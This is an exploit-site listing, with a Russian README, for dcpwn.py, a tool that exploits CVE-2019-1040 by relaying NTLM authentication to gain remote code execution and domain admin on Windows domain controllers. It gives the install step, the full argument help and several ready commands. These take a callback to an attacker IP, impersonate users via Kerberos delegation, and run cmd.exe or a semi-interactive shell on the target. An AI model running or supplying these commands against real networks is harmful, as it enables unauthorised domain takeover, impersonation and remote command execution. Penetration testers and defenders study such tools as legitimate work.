Sploitus

Exploit for CVE-2019-1040-dcpwn

kitploit · 2026-08-31

Exploit Code

MARKDOWN88 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RIDTER-CVE-2019-1040-DCPWN
# CVE-2019-1040-dcpwn

Отличное описание! Эксплуатация CVE-2019-1040 - Объединение релейных уязвимостей для RCE и Domain Admin .

Итак, я написал dcpwn.py для удобства использования.

## Требования

Эти инструменты требуют impacket. Вы можете установить его через pip

root@kitploit:~
    
    
    pip install impacket
    

## Использование

root@kitploit:~
    
    
    использование: dcpwn.py [-h] [-u USERNAME] [-p PASSWORD] [--hashes HASHES] -d DOMAIN
                    [--smb-port [destination port]] --callback-ip CALLBACK_IP
                    --ldaps LDAPS --dc-ip DC_IP [--timeout TIMEOUT]
                    [--impersonate IMPERSONATE] -t Target [-share SHARE]
                    [--command [COMMAND [COMMAND ...]]] [--debug]
    
    CVE-2019-1040 с делегированием Kerberos
    
    необязательные аргументы:
      -h, --help            показать это сообщение справки и выйти
      -u USERNAME, --user USERNAME
                            имя пользователя для аутентификации
      -p PASSWORD, --password PASSWORD
                            Пароль для аутентификации, будет запрошен, если не
                            указан и не предоставлены хеши NT:NTLM
      --hashes HASHES       хеши LM:NLTM
      -d DOMAIN, --domain DOMAIN
                            домен, в котором находится пользователь (FQDN или NETBIOS имя домена)
      --smb-port [порт назначения]
                            Порт назначения для подключения к SMB серверу
      --callback-ip CALLBACK_IP
                            Имя хоста или IP атакующего
      --ldaps LDAPS         Имя хоста или ldaps сервер
      --dc-ip DC_IP         IP-адрес контроллера домена
      --timeout TIMEOUT     тайм-аут в секундах
      --impersonate IMPERSONATE
                            целевое имя пользователя, которое будет имитировано (через
                            S4U2Self) для запроса ST. Имейте в виду, что это будет
                            работать только если личность, указанная в этом скрипте,
                            разрешена для делегирования указанному SPN
      -t Target, --target Target
                            Имя хоста/IP целевого сервера
      -share SHARE          общая папка, из которой будет взят вывод (по умолчанию
                            ADMIN$)
      --command [COMMAND [COMMAND ...]]
                            команда для выполнения на цели. Если пусто, будет
                            запущена полуинтерактивная оболочка
      --debug               Включить отладочный вывод
    

пример:

root@kitploit:~
    
    
    sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target
    

![](https://assets.kitploit.com/production/public/readmes/20151/5fb202f64dd3a04d83aa7e97aee5be470265c0a8eb46ef94911f551bcd52c2b1.png)

Если вы хотите выполнить какую-либо команду, например cmd.exe, используйте `--command`

пример:

root@kitploit:~
    
    
    sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --command 'cmd.exe'
    

Если вы хотите имитировать указанного пользователя, используйте `--impersonate`

root@kitploit:~
    
    
    sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --impersonate someone